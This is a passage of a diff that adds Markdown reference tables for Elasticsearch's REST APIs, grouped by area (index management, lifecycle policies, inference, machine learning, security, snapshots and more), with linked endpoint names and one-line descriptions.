ES|QL query. | + +### [Features](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-features) + +The feature APIs enable you to introspect and manage features provided by {{es}} and {{es}} plugins. + +| API | Description | +| --- | ----------- | +| [Get Features](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-get-features) | Lists all available features in the cluster. | +| [Reset Features](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-reset-features) | Resets internal state for system features. | + +### [Fleet](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-fleet) + +The Fleet APIs support Fleet’s use of Elasticsearch as a data store for internal agent and action data. + +| API | Description | +| --- | ----------- | +| [Run Multiple Fleet Searches](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-fleet-msearch) | Runs several Fleet searches with a single API request. | +| [Run a Fleet Search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-fleet-search) | Runs a Fleet search. | +| [Get global checkpoints](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-fleet-global-checkpoints) | Get the current global checkpoints for an index. | + +### [Graph explore](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-graph) + +The graph explore APIs enable you to extract and summarize information about the documents and terms in an {{es}} data stream or index. + +| API | Description | +| --- | ----------- | +| [Graph Explore](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-graph-explore) | Discovers relationships between indexed terms using relevance-based graph exploration. | + +### [Index](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-indices) + +The index APIs enable you to manage individual indices, index settings, aliases, mappings, and index templates. + +| API | Description | +| --- | ----------- | +| [Create index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create) | Creates a new index with optional settings and mappings. | +| [Delete index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete) | Deletes an existing index. | +| [Get index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get) | Retrieves information about one or more indices. | +| [Open index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-open) | Opens a closed index to make it available for operations. | +| [Close index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-close) | Closes an index to free up resources. | +| [Shrink index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-shrink) | Shrinks an existing index into a new index with fewer primary shards. | +| [Split index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-split) | Splits an existing index into a new index with more primary shards. | +| [Clone index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clone) | Clones an existing index into a new index. | +| [Manage index aliases](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-alias) | Manages index aliases. | +| [Update field mappings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) | Updates index mappings. | +| [Get field mappings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-mapping) | Retrieves index mappings. | +| [Get index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-settings) | Retrieves settings for one or more indices. | +| [Update index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-settings) | Updates index-level settings dynamically. | +| [Get index templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-template) | Retrieves legacy index templates. | +| [Put index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-template) | Creates or updates a legacy index template. | +| [Delete index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-template) | Deletes a legacy index template. | +| [Get composable index templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-index-template) | Retrieves composable index templates. | +| [Put composable index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-index-template) | Creates or updates a composable index template. | +| [Delete composable index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-index-template) | Deletes a composable index template. | +| [Get index alias](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-alias) | Retrieves index aliases. | +| [Delete index alias](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-alias) | Deletes index aliases. | +| [Refresh index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-refresh) | Refreshes one or more indices, making recent changes searchable. | +| [Flush index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-flush) | Performs a flush operation on one or more indices. | +| [Clear index cache](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clear-cache) | Clears caches associated with one or more indices. | +| [Force merge index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge) | Merges index segments to reduce their number and improve performance. | +| [Freeze index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-freeze) | Freezes an index, making it read-only and minimizing its resource usage. | +| [Unfreeze index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-unfreeze) | Unfreezes a frozen index, making it writeable and fully functional. | +| [Rollover index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-rollover) | Rolls over an alias to a new index when conditions are met. | +| [Resolve index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-resolve) | Resolves expressions to index names, aliases, and data streams. | +| [Simulate index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-index-template) | Simulates the application of a composable index template. | +| [Simulate template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-template) | Simulates the application of a legacy index template. | +| [Get mapping](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-mapping) | Retrieves mapping definitions for one or more indices. | +| [Put mapping](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) | Updates mapping definitions for one or more indices. | +| [Reload search analyzers](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-reload-search-analyzers) | Reloads search analyzers for one or more indices. | +| [Shrink index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-shrink) | Shrinks an existing index into a new index with fewer primary shards. | +| [Split index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-split) | Splits an existing index into a new index with more primary shards. | +| [Clone index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clone) | Clones an existing index into a new index. | + +### [Index lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ilm) + +The index lifecycle management APIs enable you to set up policies to automatically manage the index lifecycle. + +| API | Description | +| --- | ----------- | +| [Put Lifecycle Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-put-lifecycle) | Creates or updates an ILM policy. | +| [Get Lifecycle Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-lifecycle) | Retrieves one or more ILM policies. | +| [Delete Lifecycle Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-delete-lifecycle) | Deletes an ILM policy. | +| [Explain Lifecycle](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-explain-lifecycle) | Shows the current lifecycle step for indices. | +| [Move to Step](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-move-to-step) | Manually moves an index to the next step in its lifecycle. | +| [Retry Lifecycle Step](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-retry) | Retries the current lifecycle step for failed indices. | +| [Start ILM](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-start) | Starts the ILM plugin. | +| [Stop ILM](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-stop) | Stops the ILM plugin. | +| [Get ILM Status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-status) | Returns the status of the ILM plugin. | + +### [Inference](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-inference) + +The inference APIs enable you to create inference endpoints and integrate with machine learning models of different services - such as Amazon Bedrock, Anthropic, Azure AI Studio, Cohere, Google AI, Mistral, OpenAI, or HuggingFace. + +| API | Description | +| --- | ----------- | +| [Put Inference Endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) | Creates an inference endpoint. | +| [Get Inference Endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-get) | Retrieves one or more inference endpoints. | +| [Delete Inference Endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-delete) | Deletes an inference endpoint. | +| [Infer](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference) | Runs inference using a deployed model. | + +### [Info](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-info) + +The info API provides basic build, version, and cluster information. + +| API | Description | +| --- | ----------- | +| [Get cluster information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-info) | Returns basic information about the cluster. | + +### [Ingest](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ingest) + +The ingest APIs enable you to manage tasks and resources related to ingest pipelines and processors. + +| API | Description | +| --- | ----------- | +| [Create or update pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-pipeline) | Creates or updates an ingest pipeline. | +| [Get pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-pipeline) | Retrieves one or more ingest pipelines. | +| [Delete pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-pipeline) | Deletes an ingest pipeline. | +| [Simulate pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-simulate) | Simulates a document through an ingest pipeline. | +| [Get built-in grok patterns](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-processor-grok) | Returns a list of built-in grok patterns. | +| [Get processor types](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-processor-types) | Returns a list of available processor types. | +| [Put pipeline processor](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-processor) | Creates or updates a custom pipeline processor. | +| [Delete pipeline processor](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-processor) | Deletes a custom pipeline processor. | + +### [Licensing](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-license) + +The licensing APIs enable you to manage your licenses. + +| API | Description | +| --- | ----------- | +| [Get license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get) | Retrieves the current license for the cluster. | +| [Update license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post) | Updates the license for the cluster. | +| [Delete license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-delete) | Removes the current license. | +| [Start basic license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-basic) | Starts a basic license. | +| [Start trial license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-trial) | Starts a trial license. | +| [Get the trial status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get-trial-status) | Returns the status of the current trial license. | + +### [Logstash](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-logstash) + +The logstash APIs enable you to manage pipelines that are used by Logstash Central Management. + +| API | Description | +| --- | ----------- | +| [Create or update Logstash pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-put-pipeline) | Creates or updates a Logstash pipeline. | +| [Get Logstash pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-get-pipeline) | Retrieves one or more Logstash pipelines. | +| [Delete Logstash pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-delete-pipeline) | Deletes a Logstash pipeline. | + +### [Machine learning](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml) + +The machine learning APIs enable you to retrieve information related to the {{stack}} {{ml}} features. + +| API | Description | +| --- | ----------- | +| [Get machine learning memory stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-memory-stats) | Gets information about how machine learning jobs and trained models are using memory. | +| [Get machine learning info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-info) | Gets defaults and limits used by machine learning. | +| [Set upgrade mode](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-set-upgrade-mode) | Sets a cluster wide upgrade_mode setting that prepares machine learning indices for an upgrade. | +| [Get ML job stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-job-stats) | Retrieves usage statistics for ML jobs. | +| [Get ML calendar events](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendar-events) | Retrieves scheduled events for ML calendars. | +| [Get ML filters](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-filters) | Retrieves ML filters. | +| [Put ML filter](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-filter) | Creates or updates an ML filter. | +| [Delete ML filter](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-filter) | Deletes an ML filter. | +| [Get ML info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-info) | Gets overall ML info. | +| [Get ML model snapshots](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-model-snapshots) | Retrieves model snapshots for ML jobs. | +| [Revert ML model snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-revert-model-snapshot) | Reverts an ML job to a previous model snapshot. | +| [Delete expired ML data](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-expired-data) | Deletes expired ML results and model snapshots. | + +### [Machine learning anomaly detection](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml-anomaly) + +The machine learning anomaly detection APIs enbale you to perform anomaly detection activities. + + +| API | Description | +| --- | ----------- | +| [Put Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-job) | Creates an anomaly detection job. | +| [Get Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-jobs) | Retrieves configuration info for anomaly detection jobs. | +| [Delete Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-job) | Deletes an anomaly detection job. | +| [Open Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-open-job) | Opens an existing anomaly detection job. | +| [Close anomaly detection jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-close-job) | Closes an anomaly detection job. | +| [Flush Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-flush-job) | Forces any buffered data to be processed. | +| [Forecast Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-forecast) | Generates forecasts for anomaly detection jobs. | +| [Get Buckets](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-buckets) | Retrieves bucket results from a job. | +| [Get Records](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-records) | Retrieves anomaly records for a job. | +| [Get calendar configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendars) | Gets calendar configuration information. | +| [Create a calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar) | Create a calendar. | +| [Delete a calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar) | Delete a calendar. | +| [Delete events from a calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar) | Delete events from a calendar. | +| [Add anomaly detection job to calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar-job) | Add an anomoly detection job to a calendar. | +| [Delete anomaly detection jobs from calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar-job) | Deletes anomoly detection jobs from a calendar. | +| [Get datafeeds configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-datafeeds) | Get configuration information for a datafeed. | +| [Create datafeed](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-datafeed) | Creates a datafeed. | +| [Delete a datafeed](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-datafeed) | Deletes a datafeed. | +| [Delete expired ML data](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-expired-data) | Delete all job results, model snapshots and forecast data that have exceeded their retention days period. | +| [Delete expired ML data](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-expired-data) | Delete all job results, model snapshots and forecast data that have exceeded their retention days period. | +| [Get filters](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-filters) | Get a single filter or all filters. | +| [Get anomaly detection job results for influencers](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-influencers) | Get anomaly detection job results for entities that contributed to or are to blame for anomalies. | +| [Get anomaly detection job stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-job-stats) | Get anomaly detection job stats. | +| [Get anomaly detection jobs configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-jobs) | You can get information for multiple anomaly detection jobs in a single API request by using a group name, a comma-separated list of jobs, or a wildcard expression. | + +### [Machine learning data frame analytics](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml-data-frame) + +The machine learning data frame analytics APIs enbale you to perform data frame analytics activities. + +| API | Description | +| --- | ----------- | +| [Create a data frame analytics job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-data-frame-analytics) | Creates a data frame analytics job. | +| [Get data frame analytics job configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-data-frame-analyticss) | Retrieves configuration and results for analytics jobs. | +| [Delete a data frame analytics job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-data-frame-analytics) | Deletes a data frame analytics job. | +| [Start a data frame analytics job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-data-frame-analytics) | Starts a data frame analytics job. | +| [Stop data frame analytics jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-data-frame-analytics) | Stops a running data frame analytics job. | + +### [Machine learning trained models](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml-trained-model) + +The machine learning trained models APIs enable you to perform model management operations. + +| API | Description | +| --- | ----------- | +| [Put Trained Model](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model) | Uploads a trained model for inference. | +| [Get Trained Models](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models) | Retrieves configuration and stats for trained models. | +| [Delete Trained Model](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-trained-model) | Deletes a trained model. | +| [Start Deployment](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-trained-model-deployment) | Starts a trained model deployment. | +| [Stop Deployment](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-trained-model-deployment) | Stops a trained model deployment. | +| [Get Deployment Stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models-stats) | Retrieves stats for deployed models. | + +### [Migration](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-migration) + +The migration APIs power {{kib}}'s Upgrade Assistant feature. + + +| API | Description | +| --- | ----------- | +| [Deprecation Info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-deprecations) | Retrieves deprecation warnings for cluster and indices. | +| [Get Feature Upgrade Status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-get-feature-upgrade-status) | Checks upgrade status of system features. | +| [Post Feature Upgrade](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-post-feature-upgrade) | Upgrades internal system features after a version upgrade. | + +### [Node lifecycle](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-shutdown) + +The node lifecycle APIs enable you to prepare nodes for temporary or permanent shutdown, monitor the shutdown status, and enable a previously shut-down node to resume normal operations. + +| API | Description | +| --- | ----------- | +| [Exclude nodes from voting](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions) | Excludes nodes from voting in master elections. | +| [Clear voting config exclusions](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-delete-voting-config-exclusions) | Clears voting config exclusions. | + +### [Query rules](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-query_rules) + +Query rules enable you to configure per-query rules that are applied at query time to queries that match the specific rule. Query rules are organized into rulesets, collections of query rules that are matched against incoming queries. Query rules are applied using the rule query. If a query matches one or more rules in the ruleset, the query is re-written to apply the rules before searching. This allows pinning documents for only queries that match a specific term. + +| API | Description | +| --- | ----------- | +| [Create or update query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-ruleset-put-query-ruleset) | Creates or updates a query ruleset. | +| [Get query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-ruleset-get-query-ruleset) | Retrieves one or more query rulesets. | +| [Delete query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-ruleset-delete-query-ruleset) | Deletes a query ruleset. | + +### [Rollup](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-rollup) + +The rollup APIs enable you to create, manage, and retrieve infromation about rollup jobs. + +| API | Description | +| --- | ----------- | +| [Create or update rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-put-job) | Creates or updates a rollup job for summarizing historical data. | +| [Get rollup jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-jobs) | Retrieves configuration for one or more rollup jobs. | +| [Delete rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-delete-job) | Deletes a rollup job. | +| [Start rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-start-job) | Starts a rollup job. | +| [Stop rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-stop-job) | Stops a running rollup job. | +| [Get rollup capabilities](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-rollup-caps) | Returns the capabilities of rollup jobs. | +| [Search rollup data](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-rollup-search) | Searches rolled-up data using a rollup index. | + +### [Script](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-script) + +Use the script support APIs to get a list of supported script contexts and languages. Use the stored script APIs to manage stored scripts and search templates. + + +| API | Description | +| --- | ----------- | +| [Add or update stored script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-put-script) | Adds or updates a stored script. | +| [Get stored script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-get-script) | Retrieves a stored script. | +| [Delete stored script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-delete-script) | Deletes a stored script. | +| [Execute Painless script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-painless-execute) | Executes a script using the Painless language. | +| [Get script contexts](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-context) | Returns available script execution contexts. | +| [Get script languages](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-languages) | Returns available scripting languages. | + +### [Search](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-search) + +The search APIs enable you to search and aggregate data stored in {{es}} indices and data streams. + +| API | Description | +| --- | ----------- | +| [Search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) | Executes a search query on one or more indices. | +| [Multi search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-msearch) | Executes multiple search requests in a single API call. | +| [Search template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-template) | Executes a search using a stored or inline template. | +| [Render search template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-render-search-template) | Renders a search template with parameters. | +| [Explain search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-explain) | Explains how a document scores against a query. | +| [Validate query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-validate-query) | Validates a query without executing it. | +| [Get field capabilities](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-field-caps) | Returns the capabilities of fields across indices. | +| [Scroll search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-scroll) | Efficiently retrieves large numbers of results (pagination). | +| [Clear scroll](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-clear-scroll) | Clears search contexts for scroll requests. | + +### [Search application](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-search_application) + +The search applcation APIs enable you to manage tasks and resources related to Search Applications. + +| API | Description | +| --- | ----------- | +| [Create or update search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put) | Creates or updates a search application. | +| [Get search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get) | Retrieves a search application by name. | +| [Delete search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete) | Deletes a search application. | +| [Search search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-search) | Executes a search using a search application. | + +### [Searchable snapshots](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-searchable_snapshots) + +The searchable snapshots APIs enable you to perform searchable snapshots operations. + +| API | Description | +| --- | ----------- | +| [Mount searchable snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-mount) | Mounts a snapshot as a searchable index. | +| [Clear searchable snapshot cache](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-clear-cache) | Clears the cache of searchable snapshots. | +| [Get searchable snapshot stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-stats) | Returns stats about searchable snapshots. | + +### [Security](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-security) + +The security APIs enable you to perform security activities, and add, update, retrieve, and remove application privileges, role mappings, and roles. You can also create and update API keys and create and invalidate bearer tokens. + + +| API | Description | +| --- | ----------- | +| [Create or update user](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-user) | Creates or updates a user in the native realm. | +| [Get user](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user) | Retrieves one or more users. | +| [Delete user](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-user) | Deletes a user from the native realm. | +| [Create or update role](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-role) | Creates or updates a role. | +| [Get role](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-role) | Retrieves one or more roles. | +| [Delete role](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-role) | Deletes a role. | +| [Create API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-api-key) | Creates an API key for access without basic auth. | +| [Invalidate API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-invalidate-api-key) | Invalidates one or more API keys. | +| [Authenticate](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-authenticate) | Retrieves information about the authenticated user. | + +### [Snapshot and restore](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-snapshot) + +The snapshot and restore APIs enable you to set up snapshot repositories, manage snapshot backups, and restore snapshots to a running cluster. + +| API | Description | +| --- | ----------- | +| [Clean up snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-cleanup-repository) | Removes stale data from a repository. | +| [Clone snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-clone) | Clones indices from a snapshot into a new snapshot. | +| [Get snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get) | Retrieves information about snapshots. | +| [Create snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create) | Creates a snapshot of one or more indices. | +| [Delete snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete) | Deletes a snapshot from a repository. | +| [Get snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get-repository) | Retrieves information about snapshot repositories. | +| [Create or update snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create-repository) | Registers or updates a snapshot repository. | +| [Delete snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete-repository) | Deletes a snapshot repository. | +| [Restore snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-restore) | Restores a snapshot. | +| [Analyze snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-analyze) | Analyzes a snapshot repository for correctness and performance. | +| [Verify snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-verify-integrity) | Verifies access to a snapshot repository. | +| [Get snapshot status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-status) | Gets the status of a snapshot. | + +### [Snapshot lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-slm) + +The snapshot lifecycle management APIs enable you to set up policies to automatically take snapshots and control how long they are retained. + +| API | Description | +| --- | ----------- | +| [Get snapshot lifecycle policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-lifecycle) | Retrieves one or more snapshot lifecycle policies. | +| [Create or update snapshot lifecycle policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-put-lifecycle) | Creates or updates a snapshot lifecycle policy. | +| [Delete snapshot lifecycle policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-delete-lifecycle) | Deletes a snapshot lifecycle policy. | +| [Execute snapshot lifecycle 